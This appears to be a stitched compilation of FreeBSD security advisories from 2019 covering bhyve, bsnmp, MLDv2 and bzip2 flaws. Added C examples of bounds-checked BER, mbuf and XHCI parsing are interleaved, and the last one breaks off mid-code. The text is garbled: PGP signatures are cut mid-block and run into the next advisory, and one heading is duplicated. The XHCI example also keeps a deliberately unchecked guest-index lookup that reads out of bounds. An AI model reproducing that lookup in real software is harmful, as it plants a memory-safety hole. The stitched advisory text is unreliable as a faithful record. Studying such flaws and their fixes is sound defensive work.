-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl1cPgFfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cK+4w/7BCGyLpeSCIaHMpKdZvSqKc6RptLyxPq1q6XO/5fUxQiBXuwxfZIUO45o
VyQCsuVf0QDeT/HaMJAdTr450RlSs1ozyzEmd2iLfwqmpc8JRemihrzHkNMfny1U
Y4ffN6zyrOLyFeyQcdbgHUKHwuAvGZFhR/PtPJfWDmULi0vW5PHBGjxOQmxKbbUr
6zcR+gKrm5E3vLW4vD2gvsB1RGyOzUBOaEeQU36LE1/W6hhgwtXAkZacEP+W4BiB
jP
FreeBSD Security Advisory FreeBSD-SA-19:21.bhyve
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:21.bhyve                                      Security Advisory
                                                          The FreeBSD Project

Topic:          Insufficient validation of guest-supplied data (e1000 device)

Category:       core
Module:         bhyve
Announced:      2019-08-06
Credits:        Reno Robert
Affects:        All supported versions of FreeBSD.
Corrected:      2019-08-05 22:04:16 UTC (stable/12, 12.0-STABLE)
                2019-08-06 17:13:17 UTC (releng/12.0, 12.0-RELEASE-p9)
                2019-08-05 22:04:16 UTC (stable/11, 11.3-STABLE)
                2019-08-06 17:13:17 UTC (releng/11.3, 11.3-RELEASE-p2)
                2019-08-06 17:13:17 UTC (releng/11.2, 11.2-RELEASE-p13)
CVE Name:       CVE-2019-5609

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

bhyve(8) is a hypervisor that supports running a variety of guest operating
systems in virtual machines.  bhyve(8) includes an emulated Intel 82545
network interface adapter ("e1000").

II.  Problem Description

The e1000 network adapters permit a variety of modifications to an Ethernet
packet when it is being transmitted.  These include the insertion of IP and
TCP checksums, insertion of an Ethernet VLAN header, and TCP segmentation
offload ("TSO").  The e1000 device model uses an on-stack buffer to generate
the modified packet header when simulating these modifications on
transmitted packets.

When TCP segmentation offload is requested for a transmitted packet, the
e1000 device model used a guest-provided value to determine the size of the
on-stack buffer without validation.  The subsequent header generation could
overflow an incorrectly sized buffer or indirect a pointer composed of stack
garbage.

III. Impact

A misbehaving bhyve guest could overwrite memory in the bhyve process on the
host.

IV.  Workaround

Only the e1000 device model is affected; the virtio-net device is not
affected by this issue.  If supported by the guest operating system
presenting only the virtio-net device to the guest is a suitable workaround.
No workaround is available if the e1000 device model is required.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and restart any affected virtual machines.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:21/bhyve.patch
# fetch https://security.FreeBSD.org/patches/SA-19:21/bhyve.patch.asc
# gpg --verify bhyve.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <https://www.FreeBSD.org/handbook/makeworld.html>.

Restart the applicable virtual machines, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r350619
releng/12.0/                                                      r350647
stable/11/                                                        r350619
releng/11.3/                                                      r350647
releng/11.2/                                                      r350647
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5609>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-19:21.bhyve.asc>
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54
FreeBSD Security Advisory FreeBSD-SA-19:20.bsnmp
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:20.bsnmp                                      Security Advisory
                                                          The FreeBSD Project

Topic:          Insufficient message length validation in bsnmp library

Category:       contrib
Module:         bsnmp
Announced:      2019-08-06
Credits:        Guido Vranken
Affects:        All supported versions of FreeBSD.
Corrected:      2019-08-06 16:11:16 UTC (stable/12, 12.0-STABLE)
                2019-08-06 17:12:17 UTC (releng/12.0, 12.0-RELEASE-p9)
                2019-08-06 16:12:43 UTC (stable/11, 11.3-STABLE)
                2019-08-06 17:12:17 UTC (releng/11.3, 11.3-RELEASE-p2)
                2019-08-06 17:12:17 UTC (releng/11.2, 11.2-RELEASE-p13)
CVE Name:       CVE-2019-5610

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

The bsnmp software library is used for the Internet SNMP (Simple Network
Management Protocol).  As part of this it includes functions to handle ASN.1
(Abstract Syntax Notation One).

II.  Problem Description

A function extracting the length from type-length-value encoding is not
properly validating the submitted length.

III. Impact

A remote user could cause, for example, an out-of-bounds read, decoding of
unrelated data, or trigger a crash of the software such as bsnmpd resulting
in a denial of service.

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:20/bsnmp.patch
# fetch https://security.FreeBSD.org/patches/SA-19:20/bsnmp.patch.asc
# gpg --verify bsnmp.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <https://www.FreeBSD.org/handbook/makeworld.html>.

Restart all daemons that use the library, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r350637
releng/12.0/                                                      r350646
stable/11/                                                        r350638
releng/11.3/                                                      r350646
releng/11.2/                                                      r350646
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5610>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-19:20.bsnmp.asc>
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl1Jt1lfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cKtBBAAltxFzxuMqWCgJoL9SemLRQxGGk0hRFdN5b78mgVdk2lfDgVz8U7mVM6v
XbcCa4lIy7wMYpUdEySAZLR2ENt0xdpx7oQ6lAg5fnnvrUvom4wU9ruxEs5txFVL
K6RaJnQJyOkI2c/LYvI/ZYmuc29/Nt3p/DvVe7wq86taoqUufN11MXkrRHgn68N3
7vewixzWpqH5L/aY2qP1d+Xe3QmHX0IcFqeo4U3/3G4wUGRCfHtaENY4w5eUbCa2
1Qk0oS9iUdX1IJjM5l1ccoFqsjbcO6vNS337qeYNKhLspXMQPwoS0K0HfB6LKt1D
dCBFoXu/qUFjf3qqbpcqGEFrFPZjlNmC4R0Ngx1rfZ1t1dXbj83NOOE1okd3Gb/V
TPDU/jzwt+/6DE6ryNQpeanPdim83w/j+qeA0UaTyxlbj+oSz1gU9Ckaauf+9peI
GT8TPnrgmFlYg2tkYl4tbq5LtRstPGZYguqEt5SHCxBOg3dxByMPzikSFUL9oNxS
9GX7JZT36J20f62hG8Watp2y3W0QsMjJpxF9OojRU6B15Z4Q2aCht4F6DnvEkVfN
1GvS5NAHPHU09TniSgYK3ThkoYrLYykhsXPmJmETV7DU1Qhny1p8H0NwIwB20DEm
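The SA-19:20 problem description is one sentence, but the check it names is worth seeing in full. The following is an added example, not bsnmp's own ASN.1 code: a BER length decoder that handles the short and long forms and rejects every declared length the bytes in hand cannot back, plus a TLV reader built on it. The function names ber_decode_len() and ber_get_tlv(), the error codes, and the sample encodings in the test are this illustration's own.

```c
/*
 * Added example, not bsnmp's own ASN.1 code: decoding the length octets of
 * a BER type-length-value element and refusing every length that the bytes
 * actually in hand cannot back.  ber_decode_len() and ber_get_tlv() are
 * hypothetical names for this illustration.
 */
#include <stddef.h>
#include <stdint.h>

enum {
    BER_OK           =  0,
    BER_ERR_SHORT    = -1,   /* buffer ends inside the length field */
    BER_ERR_TOOLONG  = -2,   /* declared length exceeds what follows */
    BER_ERR_OVERFLOW = -3,   /* length field wider than size_t */
    BER_ERR_INDEF    = -4    /* indefinite form, not valid in SNMP */
};

/*
 * Decode the length field that starts at buf[0] with 'avail' bytes in hand.
 * On success *len is the declared content length, *hdr the number of length
 * octets consumed, and the content is guaranteed to fit in the buffer.
 */
int ber_decode_len(const uint8_t *buf, size_t avail, size_t *len, size_t *hdr)
{
    if (avail < 1)
        return BER_ERR_SHORT;
    uint8_t first = buf[0];
    if ((first & 0x80) == 0) {             /* short form: 0..127 in one octet */
        *len = first;
        *hdr = 1;
    } else {                               /* long form: low bits = octet count */
        size_t n = first & 0x7f;
        if (n == 0)
            return BER_ERR_INDEF;
        if (n > sizeof(size_t))
            return BER_ERR_OVERFLOW;
        if (avail < 1 + n)                 /* length octets themselves missing */
            return BER_ERR_SHORT;
        size_t v = 0;
        for (size_t i = 0; i < n; i++)
            v = (v << 8) | buf[1 + i];
        *len = v;
        *hdr = 1 + n;
    }
    /* The check whose absence the advisory describes: the declared content
     * length must not exceed the bytes remaining after the length field. */
    if (*len > avail - *hdr)
        return BER_ERR_TOOLONG;
    return BER_OK;
}

/*
 * Parse one TLV at buf: tag octet, length, content.  *consumed is the total
 * size of the element so the caller can step to the next one safely.
 */
int ber_get_tlv(const uint8_t *buf, size_t avail, uint8_t *tag,
                const uint8_t **val, size_t *vlen, size_t *consumed)
{
    if (avail < 1)
        return BER_ERR_SHORT;
    size_t len, hdr;
    int rc = ber_decode_len(buf + 1, avail - 1, &len, &hdr);
    if (rc != BER_OK)
        return rc;
    *tag = buf[0];
    *val = buf + 1 + hdr;
    *vlen = len;
    *consumed = 1 + hdr + len;
    return BER_OK;
}
```

Each of the three failure modes in the advisory's impact statement maps to one rejected case: a length larger than the buffer (out-of-bounds read), a length that lands the next element inside the current one (decoding of unrelated data), and an absurdly wide length field (the crash). A decoder that only checks `avail >= 1 + n` and never compares the decoded value against what remains is the shape to look for in review.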
FreeBSD Security Advisory FreeBSD-SA-19:19.mldv2
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:19.mldv2                                      Security Advisory
                                                          The FreeBSD Project

Topic:          ICMPv6 / MLDv2 out-of-bounds memory access

Category:       core
Module:         net
Announced:      2019-08-06
Credits:        CJD of Apple
Affects:        All supported versions of FreeBSD.
Corrected:      2019-08-06 17:13:41 UTC (stable/12, 12.0-STABLE)
                2019-08-06 17:11:17 UTC (releng/12.0, 12.0-RELEASE-p9)
                2019-08-06 17:15:46 UTC (stable/11, 11.3-STABLE)
                2019-08-06 17:11:17 UTC (releng/11.3, 11.3-RELEASE-p2)
                2019-08-06 17:11:17 UTC (releng/11.2, 11.2-RELEASE-p13)
CVE Name:       CVE-2019-5608

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

MLDv2 is the Multicast Listener Discovery protocol, version 2.  It is used
by IPv6 routers to discover multicast listeners.

II.  Problem Description

The ICMPv6 input path incorrectly handles cases where an MLDv2 listener
query packet is internally fragmented across multiple mbufs.

III. Impact

A remote attacker may be able to cause an out-of-bounds read or write that
may cause the kernel to attempt to access an unmapped page and subsequently
panic.

IV.  Workaround

No workaround is available.  Systems not using IPv6 are not affected.

V.   Solution

Perform one of the following:

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Reboot for security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.2, FreeBSD 11.3]
# fetch https://security.FreeBSD.org/patches/SA-19:19/mldv2.11.patch
# fetch https://security.FreeBSD.org/patches/SA-19:19/mldv2.11.patch.asc
# gpg --verify mldv2.11.patch.asc

[FreeBSD 12.0]
# fetch https://security.FreeBSD.org/patches/SA-19:19/mldv2.12.patch
# fetch https://security.FreeBSD.org/patches/SA-19:19/mldv2.12.patch.asc
# gpg --verify mldv2.12.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r350648
releng/12.0/                                                      r350644
stable/11/                                                        r350650
releng/11.3/                                                      r350644
releng/11.2/                                                      r350644
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5608>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-19:19.mldv2.asc>
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl1Jt1RfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cLzTA/+OyyukXWH7rfwMhOlpD60UH4hxN3purvdNeBe4ZxlYvtf8gSUzS1VbK5r
NR9D2HiYRlmaePOil5myan6cVkrKoANoWTrQsCcsFLe6KKbiKlQDx/btbENmCMsR
VoS0ZPx3l9iGuVUwDk6k1JXwKCcO3U3dCDYEI941hEKxYadR+twUP3JOceg8Zn0h
oODXW7LcPXWQKAyFc0Kun1VrjrUGdRGfqk30joR20GP2IjgQceFHKUbiOyBbbIjW
+UVvp2wPBxXvcXNPTpcIpTW5UGJBHCT2OsDulh7hqpiWf78VE8BoksKAvDjtI4i0
15fmwn7tmQ3aGWK3WoaKWUOXZUlKrxRQDzGyAZ3LzOqPWhv12tJjNJhjnRmCVLfo
+F4I/MHzPgjitZhv8gfn+MRiPG4E1ueAYnPQWiR3qRCLQGhemVdKZIAVnYg6NGpQ
Jgsr1QS8/3GH
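SA-19:22 (m_pulldown returning data that is not contiguous) and SA-19:19 (an MLDv2 query split across mbufs) are two faces of the same contract: a protocol parser wants N contiguous bytes, and the chain may not hand them over. The following is an added example and not FreeBSD's mbuf(9) or MLD code: a miniature mbuf chain, a pulldown helper that either returns the requested contiguous bytes or fails, and an MLDv2 query consumer that uses it and then checks that the sources the header claims are actually present. The names (struct xmbuf, xm_pulldown, mldv2_query_nsrc and friends) are hypothetical; the only thing taken from outside the page is the MLDv2 query layout from RFC 3810 (a 28-byte fixed header followed by 16-byte source addresses).

```c
/*
 * Added example, not FreeBSD's mbuf(9) code: a miniature mbuf chain, a
 * pulldown helper that either returns 'len' contiguous bytes or fails, and
 * an MLDv2 query consumer built on it.  The names (struct xmbuf, xm_pulldown,
 * mldv2_query_nsrc, ...) are hypothetical; the MLDv2 query layout is the one
 * from RFC 3810 (28-byte fixed header, 16-byte source addresses).
 */
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define XM_SIZE 16                  /* tiny data area so packets span mbufs */

struct xmbuf {
    struct xmbuf *next;
    size_t len;
    uint8_t data[XM_SIZE];
};

void xm_free(struct xmbuf *m)
{
    while (m != NULL) {
        struct xmbuf *next = m->next;
        free(m);
        m = next;
    }
}

/* Split 'total' bytes of src into a chain, XM_SIZE bytes per mbuf. */
struct xmbuf *xm_chain_from(const uint8_t *src, size_t total)
{
    struct xmbuf *head = NULL, **tail = &head;
    do {
        struct xmbuf *m = calloc(1, sizeof *m);
        if (m == NULL) {
            xm_free(head);
            return NULL;
        }
        m->len = total < XM_SIZE ? total : XM_SIZE;
        memcpy(m->data, src, m->len);
        src += m->len;
        total -= m->len;
        *tail = m;
        tail = &m->next;
    } while (total > 0);
    return head;
}

size_t xm_length(const struct xmbuf *m)
{
    size_t total = 0;
    for (; m != NULL; m = m->next)
        total += m->len;
    return total;
}

/*
 * Return a pointer to 'len' contiguous bytes starting at chain offset 'off'.
 * If they already lie inside one mbuf the pointer is into that mbuf;
 * otherwise they are gathered into 'scratch' (caller-provided, >= len bytes).
 * Returns NULL when the chain holds fewer bytes than requested, so the caller
 * never sees a "contiguous" region shorter than it asked for.
 */
const uint8_t *xm_pulldown(const struct xmbuf *m, size_t off, size_t len,
                           uint8_t *scratch)
{
    while (m != NULL && off >= m->len) {        /* find the mbuf holding off */
        off -= m->len;
        m = m->next;
    }
    if (m == NULL)
        return NULL;
    if (len <= m->len - off)
        return m->data + off;                   /* already contiguous */
    size_t got = 0;
    while (got < len) {                         /* gather across mbufs */
        if (m == NULL)
            return NULL;                        /* chain too short */
        size_t n = m->len - off;
        if (n > len - got)
            n = len - got;
        memcpy(scratch + got, m->data + off, n);
        got += n;
        off = 0;
        m = m->next;
    }
    return scratch;
}

#define MLDV2_QUERY_HDRLEN 28
#define MLDV2_NSRC_OFF     26
#define IN6_ADDRLEN        16

/*
 * Number of source addresses in an MLDv2 query that starts at chain offset
 * 'off', or -1 if the chain is too short for the fixed header or for the
 * sources the header claims.  Correct whether or not the header spans mbufs.
 */
int mldv2_query_nsrc(const struct xmbuf *m, size_t off)
{
    uint8_t scratch[MLDV2_QUERY_HDRLEN];
    const uint8_t *h = xm_pulldown(m, off, MLDV2_QUERY_HDRLEN, scratch);
    if (h == NULL)
        return -1;
    int nsrc = (h[MLDV2_NSRC_OFF] << 8) | h[MLDV2_NSRC_OFF + 1];
    size_t need = off + MLDV2_QUERY_HDRLEN + (size_t)nsrc * IN6_ADDRLEN;
    if (xm_length(m) < need)
        return -1;
    return nsrc;
}
```

Two properties matter for the advisories above: the caller of xm_pulldown() gets either exactly what it asked for or NULL (never a shorter run it then reads past), and the consumer re-checks the total chain length against the count in the header before walking the source list, so a query that claims more sources than it carries is dropped rather than parsed off the end of the last mbuf.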
FreeBSD Security Advisory FreeBSD-SA-19:18.bzip2
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:18.bzip2                                      Security Advisory
                                                          The FreeBSD Project

Topic:          Multiple vulnerabilities in bzip2

Category:       contrib
Module:         bzip2
Announced:      2019-08-06
Affects:        All supported versions of FreeBSD.
Corrected:      2019-07-04 07:29:18 UTC (stable/12, 12.0-STABLE)
                2019-08-06 17:09:47 UTC (releng/12.0, 12.0-RELEASE-p9)
                2019-07-04 07:32:25 UTC (stable/11, 11.3-STABLE)
                2019-08-06 17:09:47 UTC (releng/11.3, 11.3-RELEASE-p2)
                2019-08-06 17:09:47 UTC (releng/11.2, 11.2-RELEASE-p13)
CVE Name:       CVE-2016-3189, CVE-2019-12900

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

The bzip2(1)/bunzip2(1) utilities and the libbz2 library compress and
decompress files using an algorithm based on the Burrows-Wheeler transform.
They are generally slower than Lempel-Ziv compressors such as gzip, but
usually provide a greater compression ratio.

The bzip2recover utility extracts blocks from a damaged bzip2(1) file,
permitting partial recovery of the contents of the file.

II.  Problem Description

The decompressor used in bzip2 contains a bug which can lead to an
out-of-bounds write when processing a specially crafted bzip2(1) file.

bzip2recover contains a heap use-after-free bug which can be triggered when
processing a specially crafted bzip2(1) file.

III. Impact

An attacker who can cause maliciously crafted input to be processed may
trigger either of these bugs.  The bzip2recover bug may cause a crash,
permitting a denial-of-service.  The bzip2 decompressor bug could potentially
be exploited to execute arbitrary code.

Note that some utilities, including the tar(1) archiver and the bspatch(1)
binary patching utility (used in portsnap(8) and freebsd-update(8))
decompress bzip2(1)-compressed data internally; system administrators should
assume that their systems will at some point decompress bzip2(1)-compressed
data even if they never explicitly invoke the bunzip2(1) utility.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and restart daemons if necessary.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:18/bzip2.patch
# fetch https://security.FreeBSD.org/patches/SA-19:18/bzip2.patch.asc
# gpg --verify bzip2.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <https://www.FreeBSD.org/handbook/makeworld.html>.

Restart all daemons that use the library, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r349717
releng/12.0/                                                      r350643
stable/11/                                                        r349718
releng/11.3/                                                      r350643
releng/11.2/                                                      r350643
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3189>
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12900>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-19:18.bzip2.asc>
-----BEGIN PGP SIGNATURE-----
FreeBSD Security Advisory FreeBSD-SA-19:16.bhyve
FreeBSD Security Advisory FreeBSD-SA-19:16.bhyve

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:16.bhyve                                      Security Advisory
                                                          The FreeBSD Project

Topic:          Bhyve out-of-bounds read in XHCI device

Category:       core
Module:         bhyve
Announced:      2019-07-24
Credits:        Reno Robert
Affects:        All supported versions of FreeBSD.
Corrected:      2019-07-23 17:48:37 UTC (stable/12, 12.0-STABLE)
                2019-07-24 12:56:06 UTC (releng/12.0, 12.0-RELEASE-p8)
                2019-07-23 17:48:37 UTC (stable/11, 11.2-STABLE)
                2019-07-24 12:56:06 UTC (releng/11.2, 11.2-RELEASE-p12)
                2019-07-24 12:56:06 UTC (releng/11.3, 11.3-RELEASE-p1)
CVE Name:       CVE-2019-5604

For general information regarding FreeBSD Security Advisories, including
descriptions of the fields above, security branches, and the following
sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

bhyve(8) is a hypervisor that supports running a variety of virtual machines
(guests). bhyve includes an emulated XHCI device.

II.  Problem Description

The pci_xhci_device_doorbell() function does not validate the 'epid' and
'streamid' provided by the guest, leading to an out-of-bounds read.

III. Impact

A misbehaving bhyve guest could crash the system or access memory that it
should not be able to.

IV.  Workaround

No workaround is available, however systems not using bhyve(8) for
virtualization are not vulnerable.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date.

No reboot is required. Rather the bhyve(8) process for vulnerable virtual
machines should be restarted.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Restart any bhyve virtual machines or reboot the system.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:16/bhyve.patch
# fetch https://security.FreeBSD.org/patches/SA-19:16/bhyve.patch.asc
# gpg --verify bhyve.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <URL:https://www.FreeBSD.org/handbook/makeworld.html>.

Restart any bhyve virtual machines, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r350246
releng/12.0/                                                      r350285
stable/11/                                                        r350247
releng/11.2/                                                      r350285
releng/11.3/                                                      r350285
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following
command, replacing NN with the revision number, on a machine with Subversion
installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5604>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-19:16.bhyve.asc>
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl04WmtfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cI+Jw//TcrKrFaXkEJtqzspjoeK9YKwNwj30ewdb/Ph3GdcgVoQmfJVsWPcmcM9
+dewKdl7gGLhVhoJ+3f3oFzlDcqSxFLHcNwSW5J7P8Zt+7ZpQzwH8pfB6S8T1Nk6
77Sv5hYrjy8kdSh6Z/c8BkAQrhEFYO09xej8ekQ1B+iL2N4ErexpCNTMKlP96pGS
0/4tso5gdcwrc1t6HHGffFkjItgnE8Lvgr1ZsSHbcRGAc3nqy3n21U+VH+fecAzK
0NBO3HQeCbRIEdAms3jMLcAJGrs60VBN0nnWqLxlGBb10hY7Si0NkgbWOP2g/Elf
J+K4SHTFXbhIGrpsrEdvSVPvytQ8gKOSys5luvtLjt0Yhll08eEUDVzaIk//Hsak
BcUSlKHULLkVTJZvdZAHUMHJOMPpSAh61DuFcM+pxAt5E9rmgX+HnPBs1yLbgd23
NaQadFC126T+AW5W5GyOs2BIEo4bdTNHqONF7gmR4a5bv6/7GWZz/QNsep43jDZH
43lur9mts+/1LUCD1s4DkMniNMaGt28GMNa44PgQV
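The SA-19:16 problem description comes down to two guest-supplied indices, epid and streamid, being used to subscript the emulated controller's tables with no range check. The C model below is an added example, not bhyve's code: the table sizes, structure names and the device state set up in xhci_model_init() are assumptions chosen for illustration. It keeps the unchecked lookup for comparison and puts beside it a doorbell handler that rejects any index the device state does not account for, which is the shape of the fix for this bug class.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Scaled-down model of an emulated XHCI controller. Table sizes are
 * assumptions for this example, not bhyve's constants. */
#define MODEL_MAX_ENDPOINTS 32u   /* valid epid:     0 .. 31 */
#define MODEL_MAX_STREAMS   16u   /* valid streamid: 0 .. 15 */

struct stream_ctx {
    uint64_t ring_base;           /* guest-physical address of the transfer ring */
    uint32_t ring_idx;            /* next TRB to process */
};

struct endpoint {
    bool configured;              /* endpoint exists in the current device context */
    bool streams_enabled;         /* endpoint uses a stream table (streamid > 0 allowed) */
    struct stream_ctx streams[MODEL_MAX_STREAMS];
};

struct xhci_model {
    struct endpoint eps[MODEL_MAX_ENDPOINTS];
    uint32_t doorbells_rung;      /* accepted doorbell writes */
    uint32_t doorbells_rejected;  /* writes dropped by validation */
};

/* Shape of the bug: guest-controlled indices used as subscripts with no range
 * check. An epid or streamid beyond the tables reads whatever lies next to the
 * device structure. Kept only for comparison; only ever called here with
 * values already known to be valid. */
static struct stream_ctx *
lookup_unchecked(struct xhci_model *dev, uint32_t epid, uint32_t streamid)
{
    return &dev->eps[epid].streams[streamid];
}

/* Hardened lookup: each index is checked against the table it subscripts, and
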